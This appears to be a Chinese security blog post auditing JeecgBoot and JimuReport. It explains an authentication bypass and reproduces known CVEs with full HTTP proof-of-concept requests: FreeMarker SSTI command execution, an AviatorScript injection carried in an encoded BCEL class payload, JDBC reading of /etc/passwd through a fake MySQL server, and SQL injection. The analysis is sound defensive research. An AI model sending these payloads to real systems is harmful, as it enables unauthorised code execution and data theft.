JeecgBoot代码审计

于 2024-08-06 16:47:47 发布
阅读量395 收藏 4
点赞数 13
文章标签: 安全 web安全 java 代码复审
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_25299117/article/details/140818375
版权

环境搭建

https://github.com/jeecgboot/JeecgBoot

在release中找到3.5.0版本,新建数据库jeecg-boot,导入jeecgboot-mysql-5.7.sql文件。在application-dev.yml中更改mysql连接用户名密码。然后还需要开启Redis。

没有前端也能测漏洞。但是如果想要体验完整的功能,需要起vue3,下载相应版本的nodejs。测试最新版3.7.0时,建议从nodejs官网 https://nodejs.org/zh-cn/下载18.20版本。高或低版本的nodejs都有可能出现各种各样的错误。然后执行如下命令。最终访问ip:3100

# 进入前端代码
cd JeecgBoot/jeecgboot-vue3

# 安装依赖
pnpm install

# 运行项目
pnpm dev

框架分析

整个框架分析基于jeecg-boot 3.5.0版本,该版本采用的积木报表版本为1.5.6。

集成积木报表

3.5.0版本jeecg-boot的pom.xml文件中引入1.5.6版本积木报表

<jimureport-spring-boot-starter.version>1.5.6</jimureport-spring-boot-starter.version>
<shiro.version>1.10.0</shiro.version>

<dependency>
    <groupId>org.jeecgframework.jimureport</groupId>
    <artifactId>jimureport-spring-boot-starter</artifactId>
    <version>${jimureport-spring-boot-starter.version}</version>
    <exclusions>
        <exclusion>
            <artifactId>autopoi-web</artifactId>
            <groupId>org.jeecgframework</groupId>
        </exclusion>
	</exclusions>
</dependency>

如果从github单独下载积木报表的源码会发现只有一个框架。没有实际代码。但是如果看这个引入的jar包—jimureport-spring-boot-starter-1.5.6.jar。

1.5.6版本积木报表登录校验

积木报表进入到路由对应的方法前,都先经过JimuReportInterceptor类

获取路由对应的处理类和方法,并获取方法上的@JimuLoginRequired注解。注解示例如下。

拦截器的逻辑是,如果注解不为空(即方法上被标注了注解@JimuLoginRequired)或者verifyToken()方法返回false,那么就会校验失败。verifyToken的逻辑如下。首先传入的token参数不能为空,另外构造jwt的用户名密码必须正确。

getLoginUser这个校验需要注意,它是从Redis里面获取的。即使我们用于构造jwt的用户名密码存在于数据库中如mysql,但是这个用户没有登录过,那么Redis缓存中没有相关数据,也无法通过校验。

利用JwtUtil.sign()方法的代码生成token。代码如下。

String username="admin";
String secret="xxx";
Date date = new Date(System.currentTimeMillis() + EXPIRE_TIME);
Algorithm algorithm = Algorithm.HMAC256(secret);
return JWT.create().withClaim("username", username).withExpiresAt(date).sign(algorithm);

效果图

1.7.6版本积木报表登录校验

但是如果查看jeecg-boot目前最新的3.7.0会发现上面这个1.5.6版本登录校验的类JimuReportInterceptor不存在了。

被替换为了JimuReportTokenInterceptor。

跟进JimuReportTokenInterceptor,前面的逻辑与JimuReportInterceptor基本一致,只是多了对路径/jmreport/shareView的放行。

后面verifyToken()开始有了很大的不同。之前只要verifyToken校验不通过就直接无法访问,但现在不通过还有两个条件可以再次判断,1. isSharingEffective 2. isShareingToken(进入这个条件的前提是传入了previousPage参数)

1. isSharingEffective

先判断路由是否在如下列表中。如果在的话进入到后面的if(var3)中。否则isSharingEffective()方法直接返回false。

ShareUrlEnum.getShareUrls() = {ArrayList@21500}  size = 11
 0 = "/jmreport/getQueryInfo"
 1 = "/jmreport/share/verification"
 2 = "/jmreport/addViewCount/"
 3 = "/jmreport/show"
 4 = "/jmreport/exportPdfStream"
 5 = "/jmreport/exportAllExcelStream"
 6 = "/jmreport/checkParam/"
 7 = "/jmreport/map/queryMapByCode"
 8 = "/jmreport/qurestSql"
 9 = "/jmreport/qurestApi"
 10 = "/jmreport/getCharData"

把isSharingEffective()代码逻辑简化如下。

a. 根据路由的不同,分别获取不同的参数,如下

/jmreport/getQueryInfo、/jmreport/share/verification、/jmreport/map/queryMapByCode、/jmreport/getCharData  -> reportId
/jmreport/exportPdfStream、/jmreport/exportAllExcelStream -> excelConfigId
/jmreport/qurestSql、/jmreport/qurestApi -> apiSelectId
/jmreport/show -> id

b. 根据上述参数值执行@Sql("select * from jimu_report_share where report_id = :reportId")赋值给var8。对var8进行compareToDate()判断。

c. 如果请求中Header存在JmReport-Share-Token或者参数中存在shareToken。执行isShareingToken()判断。

如果isSharingEffective()返回false,就看另一个条件。isShareingToken(进入这个条件的前提是传入了previousPage参数)

2. isShareingToken

进入此方法,只有返回true时才能通过校验。从Header中获取JmReport-Share-Token的值,如果不存在就获取shareToken请求参数。获取jmLink请求参数,如果该参数不为空,进行base64揭秘后,如果能分割,就分别赋值给var3和var4。

如果var3不为空,但执行@Sql("select status,share_token,last_update_time,term_of_validity from jimu_report_share where share_token = :shareToken")时查不出相应数据,且路由不是以/jmreport/view开头,就会走到下面的true。

POC
/jeecg-boot/jmreport/save?previousPage=xxx&jmLink=YWFhfHxiYmI=

jmLink解密后是aaa||bbb,根据上面的分析,可以是任意的xx||xx。previousPage也可以传入任意的值。

涉及版本

1.6.2开始改成了JimuReportTokenInterceptor,但此时只获取previousPage,并没有isShareingToken的校验问题。1.7.0开始加入isShareingToken方法。也就是积木报表从1.7.0版本开始受jmLink登录绕过漏洞的影响

历史漏洞

挑几个重点的历史漏洞分析一下。

漏洞名称CVE编号影响版本
/jmreport/qurestSql sql注入漏洞CVE-2023-14543.5.0
/jmreport/show sql注入漏洞CVE-2023-346593.5.0 and 3.5.1
testConnection JDBC 远程代码执行漏洞CVE-2023-41578<=3.5.3
/jmreport/queryFieldBySql SSTI漏洞CVE-2023-4450jeecgboot JimuReport <=1.6.0
/jmreport/loadTableData SSTI漏洞CVE-2023-41544<=3.5.3
/jmreport/save AviatorScript代码注入漏洞暂未分配编号-

SSTI漏洞简单demo

 首先看一下两个SSTI漏洞的demo。一个是在代码中传入Template。

另一个则是可以调用或控制.ftl文件。

.ftl内容如下

<body>
<h3>
    <#assign value="freemarker.template.utility.Execute"?new()>${value("open -a Calculator")}
</h3>
</body>

JDBC漏洞简单demo

漏洞的代码核心是要能控制传入的jdbcUrl。

Class.forName("com.mysql.cj.jdbc.Driver");
Connection connection = DriverManager.getConnection(jdbcUrl);

AviatorScript代码注入漏洞简单demo

AviatorScript之前有个代码注入漏洞,参考官方链接如下:

There is a critical expression injection RCE vulnerability in this expression engine(该表达式引擎存在表达式注入漏洞) · Issue #421 · killme2008/aviatorscript · GitHub

代码可以写成两种形式。jeecgboot受影响的就是第二种写法。

# 1
AviatorEvaluatorInstance evaluator = AviatorEvaluator.newInstance();
evaluator.execute(expression);

# 2
AviatorEvaluatorInstance evaluator = AviatorEvaluator.newInstance();
Expression compiledExp = evaluator.compile(expression);
Map<String, Object> env = new HashMap<>();
env.put("Z0", 0);
Object result = compiledExp.execute(env);

POC如下

(c=Class.forName(\"$$BCEL$$$l$8b$I$A$A$A$A$A$A$AeP$cbN$c2$40$U$3dCK$5bk$95$97$f8$7e$c4$95$c0$c2$s$c6$j$c6$NjbR$c5$88a_$ca$E$86$40k$da$c1$f0Y$baQ$e3$c2$P$f0$a3$8cw$w$B$a2M$e6$de9$e7$9es$e6$a6_$df$l$9f$ANq$60$p$8b$b2$8dul$a8$b2ib$cb$c46$83q$sB$n$cf$Z$b4J$b5$cd$a07$a2$$g$c8y$o$e4$b7$e3Q$87$c7$P$7egHL$d1$8b$C$7f$d8$f6c$a1$f0$94$d4e_$q$MY$afqsQ$t$c8$t$3c$608$aax$D$ff$c9w$87$7e$d8s$5b2$Wa$af$5e$5d$a0$ee$e2$u$e0IB$G$z$YuU$f4$3f9$83$7d9$J$f8$a3$UQ$98$98$d8$n$dc$8a$c6q$c0$af$84z$d7$a2$f7$8e$95$c9$81$B$d3$c4$ae$83$3d$ec$3bX$c1$w$85$d2$90$n$3f$cflv$G$3c$90$M$a5$94$S$91$7b$dd$9c$853$U$e6$c2$fbq$u$c5$88$f2$ed$k$973P$ae$y$$$3f$a5$eb8$84N$7fT$7d$Z0$b5$GU$8b$90K$9dQ$cf$d6$de$c0$5e$d2$f1$SU$p$r5$d8T$9d_$B$96$e9$G$9a$d2$da$a4R$e6$934$M$b0$de$91$a9$bdB$7b$fe$e37$W$fc$Wr$c8S$_$d0$d1$89$v$d2$v$a5$fa$b5$l$d5$l$f2$9c$f6$B$A$A\",true,new com.sun.org.apache.bcel.internal.util.ClassLoader()) ) + ( c.exec(\"open /System/Applications/Calculator.app\"))

/jmreport/queryFieldBySql SSTI漏洞

漏洞定位jimureport-spring-boot-starter-1.5.6.jar!/org/jeecg/modules/jmreport/desreport/a/a.class。从传入的json字符串中获取key为"sql"的value值,然后先调用i.a进行sql关键字检测,如果没有匹配到恶意特征,再从json字符串中获取其他的key。由于本地部署,不是saas化的,会直接执行到parseReportSql方法。

i.a()方法进行sql关键字进行检测的特征如下,匹配上会抛出异常。

String[] var1 = " exec | insert | alter | delete | grant | update | drop | chr | mid | master | truncate | char | declare |user()|".split("\\|");
Pattern.matches("show\\s+tables")

如果没有传入paramArray参数,执行parseReportSql时,会调用如下方法对sql进行处理。var0就是传入的sql值。这里再次调用i.a对var0进行sql恶意关键字的匹配。b方法同样也是进行sql处理。例如,如果匹配到where,就替换成where 1=1等。

跟进断点处的a方法。它匹配${}形式的占位符,如果JSONArray不为空,遍历JSONArray中的每个JSONObject,并检查其包含的paramNameparamValue。根据这些值,替换输入字符串中的占位符,并更新var2中的值。最后调用FreeMarkerUtils.a方法,使用var2替换var1中的占位符。

跟进FreeMarkerUtils.a()方法中,典型的Freemarker SSTI特征—Template.process()。

POC

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 10.128.5.250:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
Connection: close
Content-Length: 124

{
    "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"open -a Calculator\")}",
    "type": "0"
}

复现如图。

/jmreport/loadTableData SSTI漏洞

漏洞定位同样位于a.class

跟进loadTableData,调用了与上面SSTI漏洞相同的e.a方法。

后续执行与上面SSTI相同。

POC

POST /jeecg-boot/jmreport/loadTableData HTTP/1.1
Host: 10.128.5.250:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
Connection: close
Content-Length: 181

{"dbSource":"","sql":"select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"open -a Calculator\") }'","tableName":"test_demo);","pageNo":1,"pageSize":10}

漏洞复现

/jmreport/testConnection jdbc远程代码执行漏洞

漏洞定位

请求体的数据类型为JmreportDynamicDataSourceVo,包含如下字段。获取DbType类型,判断是否为redis或者mongodb。获取DbDriver加载该类,获取DbUrl,执行DriverManager.getConnection()。

由于请求体可控,那么只需要构造JmreportDynamicDataSourceVo的相关字段,即可。

网上有很多打H2的payload,但是默认的jeecg-boot环境是没有H2的。这里打mysql。

POC。mysql服务器选用的MySQL_Fake_Server。将服务端口改为3307,起服务尝试读取文件

POST /jeecg-boot/jmreport/testConnection HTTP/1.1
Host: 10.128.5.250:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cmd: whoami
Content-Type: application/json
Connection: close
Content-Length: 350

{
    "id":"1",
    "code":"select * from information_schema.tables",
    "dbType":"jndi",
    "dbDriver":"com.mysql.cj.jdbc.Driver",
    "dbUrl":"jdbc:mysql://localhost:3307/test?allowLoadLocalInfile=yes",
    "dbName":"information_schema",
    "dbUsername":"fileread_/etc/passwd",
    "dbPassword":"password",
    "connectionTimaes":"5"
}

漏洞复现,如图。

漏洞发现者:

Jeecg-boot <=3.5.3 Arbitrary File Read · Issue #1 · Snakinya/Bugs · GitHub

/jmreport/qurestSql sql注入漏洞

漏洞定位还是jimureport-spring-boot-starter-1.5.6.jar!/org/jeecg/modules/jmreport/desreport/a/a.class。从json字符串中读取key为apiSelectId的值,根据这个值去数据库查询数据。

跟进getById。实际执行的sql是select * from jimu_report_db WHERE ID=:id

看一下数据库里的jimu_report_db表的数据。

其中db_dyn_sql字段值也是一句sql。select * from rep_demo_employee  where id='${id}'。跟进调试确实返回的是这些数据,并赋值给了var4。

qurestechSql实现逻辑

1. 先取出对应的db_dyn_sql的sql值。

2. 根据id值(对应JIMU_REPORT_HEAD_ID),从jimu_report_db_param表查数据

数据库中查询如下。

3. 将传入的json格式var1的值和shared_query_param组成键值对。然后JSONObject var12 = (JSONObject)var11.get("shared_query_param");再获取这个值。

4. getDbSql

this.getBaseSql(reportDb, paramObject);这步拼接成如下的sql

select * from rep_demo_employee  where id='1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like ''

POC

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: 10.128.5.250:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
Connection: close
Content-Length: 128

{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}

/jmreport/show sql注入漏洞

漏洞定位jimureport-spring-boot-starter-1.5.6.jar!/org/jeecg/modules/jmreport/desreport/a/a.class。获取json中的id和params值

调用show方法。先根据id查询数据@Sql("SELECT * FROM jimu_report WHERE ID = :id")



其中getDataById最终调用的方法同样是getDbSql。

发现者:Unauthorized SQL injection in Jeecg3.5.0 and 3.5.1 · Issue #4976 · jeecgboot/JeecgBoot · GitHub

POC如下。注意json格式。否则会报错。

POST /jeecg-boot/jmreport/show HTTP/1.1
Host: 10.128.5.250:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
Connection: close
Content-Length: 189

{
    "id":"961455b47c0b86dc961e90b5893bff05",
    "apiUrl":"",
    "params":
        "{\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(select database())),1)) or '%%' like '\"}"
}

漏洞复现

还有一些漏洞是绕官方sql黑名单的,如CVE-2023-38905等,不分析了。

https://github.com/jeecgboot/JeecgBoot/issues/4737

/jmreport/save AviatorScript代码注入漏洞

进入积木报表控制台,点击新建报表,在表格内随意填入内容,点击保存的时候,由/save路由对应的方法来处理。保存excel json数据。

最终执行update方法,将excel内容转成json字符串存入jimu_report表中。

这也是刚开始看save方法没有发现表达式注入的原因。因为这步只进行了存储。而只有进行预览的时候,才能触发表达式操作。点击预览,由/show路由对应的方法进行处理。根据传入的id值从数据库中查询出存入的json数据,调用ExpressUtil进行处理。

最终执行到如下位置。

访问show触发表达式,配合上面分析的积木报表登录校验绕过,实现未授权RCE。

漏洞发现者:积木报表软件存在AviatorScript代码注入RCE漏洞 · Issue #2848 · jeecgboot/JimuReport · GitHub

最后说一下AviatorScript代码注入这个点,在上面demo中给出了当年漏洞提交的日期是2021年,当时有其他研究者测试并回复,AviatorScript受影响的版本是>=5.2.1(jeecg-boot3.7.0用的AviatorScript 5.2.6,即受影响版本)。组件开发者也基本确认,4.x版本中并不支持new/if这些语句因此不受影响。另外,当时组件开发者给出的漏洞修复方案是,设置允许访问的类的白名单。假如白名单为空,也就禁止了任何字段或方法的调用。语句如下

evaluator.setOption(Options.ALLOWED_CLASS_SET, Collections.emptySet());

另外,在组件的官网上,最佳实践 · 语雀给出了相关的说明。从5.2.2版本开始增加了上述的ALLOWED_CLASS_SET选项。

但是既然是选项,就要求使用AviatorScript的开发者自己去设置,那么使用AviatorScript 5.2.1以上版本的软件中,都有可能受此漏洞影响,并且没有设置相关安全白名单。审计的时候看到库中包含AviatorScript可以留意一下版本以及是否存在调用。

白帽AxisX
关注
  • 13
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JEECG代码审计之文件上传
洋洋的小黑屋
04-01 564
JEECG代码审计之文件上传 0x01 简述 JEECG(J2EE Code Generation)是一款基于代码生成器JEE的智能开发平台。引领新的开发模式(Online Coding->代码生成器->手工MERGE智能开发),可以帮助解决Java项目90%的重复工作,让开发更多关注业务逻辑。既能快速提高开发效率,帮助公司节省人力成本,同时又不失灵活性。 0x02 环境搭建 mys...
我对jeecg-boot项目的理解、使用心得和改进建议
zhengun的专栏
06-22 6584
jeecg-boot是什么? 官方介绍 JeecgBoot 是一款基于代码生成器的低代码开发平台,零代码开发!采用前后端分离架构:SpringBoot2.x,Ant Design&Vue,Mybatis-plus,Shiro,JWT。强大的代码生成器让前后端代码一键生成,无需写任何代码! JeecgBoot引领新的开发模式(Online Coding模式-> 代码生成器模式-> 手工MERGE智能开发), 帮助解决Java项目70%的重复工作,让开发更多关注业务逻辑。既能快速提高
mybatis自动注入审计,读jeecgboot
08-18 246
核心使用mybatis 的interceptor 实现。优点是实现更优雅,零侵入性。比MetaObjectHandler实现更优雅,无需配置注解TableFiled。
JAVA代码审计-cms综合篇
shelter1234567的博客
11-02 482
本次用一个cms的源码,来综合深入学习java代码审计...
代码审计|基于某Java开源系统的代码审计
weixin_42282189的博客
09-17 1996
作者:不染 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 本篇文章为Java代码审计入门的一篇文章,篇幅有限,很多漏洞没有审计覆盖,以后有时间再更新一个系列。 0x01 基础环境 1.1 技术框架 核心框架:SpringBoot 2.0.0 持久层框架:Mybatis 1.3.2 日志管理:Log4j 2.10.0 前端框架:Vue 2.6.10 UI框架: Ant-Design-Vue 1.5.2 模板框架: Jeecg-Boot 2.2.0 项目管理框架:.
WMCTF2022 WEB
qq_53263789的博客
08-24 1556
WMCTF2022-WEB
人工智能帮我建商城——文心一言代写基于jeecgboot的商城系统【springboot
wwppp987的博客
12-15 1474
这些字段提供了一个全面的商城用户扩展表结构,涵盖了用户在商城中可能需要的各种额外信息和设置。请注意,这些字段仅供参考,具体实现时还需考虑商城系统的业务需求和用户实际需求,进行适当的调整和扩展。这些字段提供了一个全面的商城用户授权表结构,涵盖了多商户和多权限场景下用户授权所需的各种信息和设置。这些字段提供了一个全面的商城用户基础表结构,涵盖了用户在商城中可能需要的各种信息和设置。这只是一个基本的模块列表,具体的功能和设计应根据实际业务需求和目标用户群体进行调整和优化。手机端为主,pc端以手机端框架进行设计。
[代码审计]jeecg-boot最新权限绕过漏洞分析及新绕过发现
LiangYueSec的博客
08-01 1782
[代码审计]jeecg-boot最新权限绕过分析及新绕过发现
jeecg审核流程
weixin_44237979的博客
07-26 255
如图所示我们的任务其实有三个节点,分别是form,step1,step2三个任务节点,但是form在我们的业务中是填写的表单,所以在逻辑上其实这个任务不需要审核,直接通过即可。之后获取的流程,流程具体在系统设置中可以看到,然后我们将整个流程的密钥,key统一设置为in——bound,就是所有该流程的节点都是通过这个key来进行传递验证的。以下流程主要记录节点的审批信息,即表单每个节点的审批意见,不同审批的过程中的信息不同,这里仅作为入库处理。中记录结点的信息,流程中要过哪些节点就要从这里进行记录。
JEECGBOOT代码SQL漏洞处理方案.zip
06-21
提供的压缩包文件"JEECGBOOT代码SQL漏洞处理方案"应该包含了针对这个问题的详细修复步骤和指导。用户应当立即下载并按照其中的说明进行操作,以保护他们的系统免受SQL注入的威胁。同时,为了防止未来类似的问题,...
jeecgboot +activiti5.22集成
07-15
JeecgBoot是一款基于Spring Boot快速开发平台,它提供了丰富的功能组件,如代码生成器、权限管理、工作流等,极大地简化了开发流程。而Activiti则是一个流行的工作流引擎,它能够帮助开发者设计、执行和管理业务流程...
jeecgboot(postgreSQL).pdf
11-12
Jeecgboot 是一个基于 Spring Boot 的低代码开发平台,旨在帮助开发者快速构建企业级应用程序。PostgreSQL 是一个功能强大且免费的开源关系数据库管理系统。本文将指导您如何将 Jeecgboot 与 PostgreSQL 集成,以便...
JEECG BOOT代码开发平台Java项目开源源码
04-14
JEECG BOOT 是一个基于Java技术的低代码开发平台,它的核心目标是帮助企业快速构建业务系统,降低开发成本,提升开发效率。通过提供可视化配置和代码生成能力,使得开发者无需从零开始编写大量重复性的基础代码,...
jeecg-boot.zip
07-15
JeecgBoot是基于代码生成器的智能快速开发平台,它整合了SpringBoot、MyBatisPlus、Shiro、JWT、Vue.js等热门框架和技术,实现了前后端分离,提供强大的代码生成器,可以自动生成各类代码,极大地减少了开发工作量。...
EHS信息化管理系统:筑牢企业EHS安全环保的数字防线
云说智数的博客
08-05 1111
EHS信息化管理,简而言之,就是运用现代信息技术手段,对企业在环境保护、职业健康与安全方面的管理活动进行系统化、数字化、网络化的改造与升级。这一过程涉及数据采集、分析、处理、存储及决策支持等多个环节,旨在通过高效的信息流动和智能化的管理工具,实现EHS管理的精细化、实时化和可追溯化。基于 ISO14001和45001规范,聚焦于工厂重大环境因素、安全风险防范、职业健康安全的改进,从环境保护、消防管理、安全管理、职卫管理、大数据平台这5个功能模块,帮助企业实现安全健康的数字化管理。
等保测评中的访问控制与用户认证:构建安全的访问管理机制
w13359990065的博客
08-05 672
在实施访问控制与用户认证过程中,企业应注重持续改进,将信息安全融入企业文化和日常运营,形成全员参与的信息安全文化,共同守护企业信息资产的安全。等保测评,作为我国信息安全等级保护制度的重要组成部分,对访问控制与用户认证提出了严格要求,旨在构建安全的访问管理机制,保护信息资产不受未授权访问和恶意攻击。访问控制是信息安全体系中的基石,通过确定和管理用户对资源的访问权限,确保只有经过授权的用户才能访问相应级别的信息资源。用户认证是访问控制的第一步,通过验证用户身份,确保只有合法用户能够访问系统资源。
自学黑客(网络安全
最新发布
2301_77160226的博客
08-05 1333
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网安新声 | 微软蓝屏事件安全启示录
WAJXY2021的博客
08-05 140
微软蓝屏事件敲响警钟,给行业带来什么样的反思呢?
JeecgBoot代码生成器
09-05
JeecgBoot代码生成器是一个用于生成后端代码和前端代码的工具。你可以使用它来生成基于数据库表结构的代码,以减少重复的编码工作。使用JeecgBoot代码生成器的步骤如下: 1. 在MySQL中创建一张表,命名为test_demo(也可以根据需要进行更改)。 2. 打开后端项目,配置代码生成器。找到jeecg-boot/jeecg-boot-module-system/src/main/resources/jeecg/jeecg_config.properties文件,将代码生成路径进行配置。 3. 找到生成的代码,并将其复制到后台代码路径下。可以复制到\jeecg-boot\jeecg-boot-module-system\src\main\java\org\jeecg\modules\demo路径下,也可以复制到\jeecg-boot\jeecg-boot-module-system\src\main\java\路径下。 4. 在eclipse中选中src文件夹并按F5刷新,这样就可以看到代码已经导入到项目中。 5. 如果在生成代码后修改了包名,请注意同时修改类中的包名。 6. 将vue文件夹下的文件复制到前端代码中。可以放在ant-design-vue-jeecg\src\views\modules文件夹下,并可以根据需要修改vue文件夹的名称。 通过以上步骤,你就可以使用JeecgBoot代码生成器来自动生成后端和前端代码了。这样可以节省开发时间,提高工作效率。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [jeecg-boot 代码生成器](https://blog.csdn.net/qq_41722795/article/details/105946973)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [jeecgboot代码生成器生成代码案例、菜单配置、集合路由](https://blog.csdn.net/feiqipengcheng/article/details/115286134)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值